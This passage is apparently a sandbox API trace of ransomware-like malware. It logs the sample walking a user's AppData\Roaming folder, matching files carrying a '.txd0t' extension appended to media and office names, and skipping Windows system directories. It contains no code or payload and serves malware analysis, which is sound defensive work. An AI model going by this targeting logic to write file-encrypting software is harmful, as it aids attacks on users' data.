cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="CUCgHoAM.wav.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav.txd0t" [0129.131] PathFindExtensionW (pszPath="CUCgHoAM.wav.txd0t") returned=".txd0t" [0129.131] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.131] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="cv28-Ixq4k3KD.mkv.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv.txd0t" [0129.131] PathFindExtensionW (pszPath="cv28-Ixq4k3KD.mkv.txd0t") returned=".txd0t" [0129.131] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.131] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="D3INp6Ei.xlsx.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx.txd0t" [0129.131] PathFindExtensionW (pszPath="D3INp6Ei.xlsx.txd0t") returned=".txd0t" [0129.131] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.131] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="DRvrEGQ_bV7.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png.txd0t" [0129.131] PathFindExtensionW (pszPath="DRvrEGQ_bV7.png.txd0t") returned=".txd0t" [0129.131] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.131] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="DVmE9qFtb1fE2H.bmp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp.txd0t" [0129.131] PathFindExtensionW (pszPath="DVmE9qFtb1fE2H.bmp.txd0t") returned=".txd0t" [0129.131] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.131] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="ET9_8drX4.bmp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp.txd0t" [0129.131] PathFindExtensionW (pszPath="ET9_8drX4.bmp.txd0t") returned=".txd0t" [0129.131] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.131] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="f_xuR_I_FeQoISyA_I.avi.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi.txd0t" [0129.132] PathFindExtensionW (pszPath="f_xuR_I_FeQoISyA_I.avi.txd0t") returned=".txd0t" [0129.132] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.132] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="j9Q4P.avi.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi.txd0t" [0129.132] PathFindExtensionW (pszPath="j9Q4P.avi.txd0t") returned=".txd0t" [0129.132] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.132] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="juYPe6EuKhsFCwN.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3.txd0t" [0129.132] PathFindExtensionW (pszPath="juYPe6EuKhsFCwN.mp3.txd0t") returned=".txd0t" [0129.132] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.132] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="jZeT4BL.m4a.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a.txd0t" [0129.132] PathFindExtensionW (pszPath="jZeT4BL.m4a.txd0t") returned=".txd0t" [0129.132] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.132] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Macromedia", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia" [0129.132] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="mFz6aNQKv94_Rr.mkv.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv.txd0t" [0129.132] PathFindExtensionW (pszPath="mFz6aNQKv94_Rr.mkv.txd0t") returned=".txd0t" [0129.132] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.132] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="mlrbk-2k1.jpg.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg.txd0t" [0129.132] PathFindExtensionW (pszPath="mlrbk-2k1.jpg.txd0t") returned=".txd0t" [0129.133] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.133] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Mozilla", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla" [0129.133] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="n5hRh8HkX hRtD-9n.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png.txd0t" [0129.133] PathFindExtensionW (pszPath="n5hRh8HkX hRtD-9n.png.txd0t") returned=".txd0t" [0129.133] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.133] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="PDHYzrp.wav.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav.txd0t" [0129.133] PathFindExtensionW (pszPath="PDHYzrp.wav.txd0t") returned=".txd0t" [0129.133] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.133] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="PjcNBr9EvQRuRkXhA.swf.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf.txd0t" [0129.133] PathFindExtensionW (pszPath="PjcNBr9EvQRuRkXhA.swf.txd0t") returned=".txd0t" [0129.133] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.133] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="pMTil.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png.txd0t" [0129.133] PathFindExtensionW (pszPath="pMTil.png.txd0t") returned=".txd0t" [0129.133] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.133] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="QsWrg_KB.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3.txd0t" [0129.133] PathFindExtensionW (pszPath="QsWrg_KB.mp3.txd0t") returned=".txd0t" [0129.133] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.133] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.172] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.172] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="s8RH8_.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3.txd0t" [0129.173] PathFindExtensionW (pszPath="s8RH8_.mp3.txd0t") returned=".txd0t" [0129.173] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.173] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.173] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.173] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="SKsJaHK4avL.odp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp.txd0t" [0129.173] PathFindExtensionW (pszPath="SKsJaHK4avL.odp.txd0t") returned=".txd0t" [0129.173] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.173] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.173] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.173] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Skype", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype" [0129.173] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\system32\\") returned 0x0 [0129.174] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.174] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\system\\") returned 0x0 [0129.174] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.174] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Skype" [0129.174] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.174] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.174] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="sT1K.flv.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv.txd0t" [0129.174] PathFindExtensionW (pszPath="sT1K.flv.txd0t") returned=".txd0t" [0129.174] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.174] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.174] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.174] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Sun", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun" [0129.174] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\system32\\") returned 0x0 [0129.174] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.174] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\system\\") returned 0x0 [0129.174] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.174] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Sun" [0129.174] StrCmpW (psz1="U6XvU G.bmp.txd0t", psz2=".") returned 1 [0129.174] StrCmpW (psz1="U6XvU G.bmp.txd0t", psz2="..") returned 1 [0129.174] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.174] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.174] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="U6XvU G.bmp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp.txd0t" [0129.174] PathFindExtensionW (pszPath="U6XvU G.bmp.txd0t") returned=".txd0t" [0129.175] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.175] StrCmpW (psz1="U9jIHqltNvJBusuu8M.m4a.txd0t", psz2=".") returned 1 [0129.175] StrCmpW (psz1="U9jIHqltNvJBusuu8M.m4a.txd0t", psz2="..") returned 1 [0129.175] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.175] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.175] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="U9jIHqltNvJBusuu8M.m4a.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a.txd0t" [0129.175] PathFindExtensionW (pszPath="U9jIHqltNvJBusuu8M.m4a.txd0t") returned=".txd0t" [0129.175] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.175] StrCmpW (psz1="uBqsl.png.txd0t", psz2=".") returned 1 [0129.175] StrCmpW (psz1="uBqsl.png.txd0t", psz2="..") returned 1 [0129.175] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.175] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.175] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="uBqsl.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png.txd0t" [0129.175] PathFindExtensionW (pszPath="uBqsl.png.txd0t") returned=".txd0t" [0129.175] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.175] StrCmpW (psz1="UFfU-NQWoB7XyHy.mp3.txd0t", psz2=".") returned 1 [0129.175] StrCmpW (psz1="UFfU-NQWoB7XyHy.mp3.txd0t", psz2="..") returned 1 [0129.175] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.175] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.175] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="UFfU-NQWoB7XyHy.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3.txd0t" [0129.175] 